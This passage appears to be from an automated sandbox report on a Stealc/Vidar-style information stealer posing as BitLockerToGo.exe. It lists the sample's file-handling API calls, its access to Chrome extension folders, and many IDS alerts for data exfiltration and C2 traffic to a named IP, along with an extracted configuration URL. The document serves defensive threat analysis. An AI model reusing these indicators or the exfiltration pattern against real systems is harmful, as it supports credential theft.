                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, | 3_2_004013DA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, | 3_2_00406784
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, | 3_2_00411187
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 3_2_00412A5D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, | 3_2_00409C78
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 3_2_00408224
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, | 3_2_00412539
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, | 3_2_00411BD2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, | 3_2_00411722
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: chrome.exe | Memory has grown: Private usage: 5MB later: 38MB

                  Networking

                  Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.8:49717 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49719 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.8:49714 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 77.239.117.222:443 -> 192.168.2.8:49717
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49743 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 77.239.117.222:443 -> 192.168.2.8:49716
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49746 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49746 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49747 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49747 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49749 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49718 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49785 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49785 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49778 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49853 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49853 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49839 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49839 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49808 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49808 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49859 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49859 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49748 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49748 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49805 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49805 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49936 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49946 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49957 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49904 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50019 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50042 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50036 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50048 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50056 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50071 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50065 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49891 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50117 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50094 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50100 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50013 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50088 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50077 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50111 -> 77.239.117.222:443
                  Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199825403037
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 77.239.117.222 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----pzctjec2n7y58ycjw47q Host: 77.239.117.222 Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----y5fk6f37qie37q1ngl6x Host: 77.239.117.222 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----gva1noz5pphvaasr1dbs Host: 77.239.117.222 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----d2djecbiwb1dbaas268y Host: 77.239.117.222 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----imy5ph47qq9zm79h47qq Host: 77.239.117.222 Content-Length: 6101 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----imy5ph47qq9zm79h47qq Host: 77.239.117.222 Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----t26pphlfc2ngvaaieusr Host: 77.239.117.222 Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----rimglf379zctrq9r1ng4 Host: 77.239.117.222 Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----rimglf379zctrq9r1ng4 Host: 77.239.117.222 Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ozu37qqqiwl6f3wbsrim Host: 77.239.117.222 Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----v3w4euaiect0zusjw4wb Host: 77.239.117.222 Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----xt2dbs0r1n7yua1db1ny Host: 77.239.117.222 Content-Length: 3161 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----fc2no8yct00rqi58gvkx Host: 77.239.117.222 Content-Length: 207993 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----q9h4w4oppph47ymohl68 Host: 77.239.117.222 Content-Length: 68733 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----89hdt0hdbimozmyukny5 Host: 77.239.117.222 Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ieusjwb1v3oh479riwbi Host: 77.239.117.222 Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----qiwlx4euknop8ymym7qq Host: 77.239.117.222 Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----pph4eu37qieuaaasr9h4 Host: 77.239.117.222 Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----jecbi5fkfusrqq9zmyct Host: 77.239.117.222 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----kx4opzcbi5fcbie37q9r Host: 77.239.117.222 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----hv3ek6fknop8ym7ymoph Host: 77.239.117.222 Content-Length: 61029 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----q9h4w4oppph47ymohl68 Host: 77.239.117.222 Content-Length: 7005 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----89zcba1nym7gv3e3oh47 Host: 77.239.117.222 Content-Length: 60993 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----26xbs2dtrqieuaimgdjm Host: 77.239.117.222 Content-Length: 61005 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----hdj5fc2ngvaaaimy5xlf Host: 77.239.117.222 Content-Length: 6985 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----uai5x4w47gv3eus0hdtj Host: 77.239.117.222 Content-Length: 60969 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----jecbasjekf37qieu37qq Host: 77.239.117.222 Content-Length: 32481 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2d2vasr9h4e3eus0hd2v Host: 77.239.117.222 Content-Length: 4421 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2d2vasr9h4e3eus0hd2v Host: 77.239.117.222 Content-Length: 2449 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----mophdt0hdjmyuaiwtje3 Host: 77.239.117.222 Content-Length: 6533 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----y58gdtjm7gvaaaie3wba Host: 77.239.117.222 Content-Length: 3269 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4op8gvkxt2v37q1nohdb Host: 77.239.117.222 Content-Length: 11445 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----dtrqieuaai58yuaiwtjm Host: 77.239.117.222 Content-Length: 14153 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----nyc2ngv37ycbim7y5xbi Host: 77.239.117.222 Content-Length: 4277 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----nyc2ngv37ycbim7y5xbi Host: 77.239.117.222 Content-Length: 4273 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----zu3o8glf3ekfu3ecjmgl Host: 77.239.117.222 Content-Length: 4573 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----gvs0hvs2v3w4e3euk6p8 Host: 77.239.117.222 Content-Length: 1977 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----vaimy5pp8q9zmyct00ri Host: 77.239.117.222 Content-Length: 3161 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----xbieu3e3ec2nymgdtjeu Host: 77.239.117.222 Content-Length: 1697 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----hv3ek6fknop8ym7ymoph Host: 77.239.117.222 Content-Length: 1929 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----i5x4ozu3euasrq16pzu3 Host: 77.239.117.222 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----gvs00r1nym79rq1vs0zu Host: 77.239.117.222 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----yu379r9hlfkx479h47ym Host: 77.239.117.222 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                  Source: Joe Sandbox View | IP Address: 20.189.173.7 20.189.173.7
                  Source: Joe Sandbox View | IP Address: 2.22.242.105 2.22.242.105
                  Source: Joe Sandbox View | IP Address: 23.219.82.59 23.219.82.59
                  Source: Joe Sandbox View | IP Address: 162.159.61.3 162.159.61.3
                  Source: Joe Sandbox View | JA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49718 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49719 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49713 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49717 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49746 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49747 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49748 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49749 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49743 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49778 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49785 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49805 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49808 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49839 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49853 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49859 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49876 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49870 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49891 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49920 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49904 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49957 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50013 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50042 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49936 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50048 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50056 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49946 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50071 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50065 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50094 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50077 -> 77.239.117.222:443
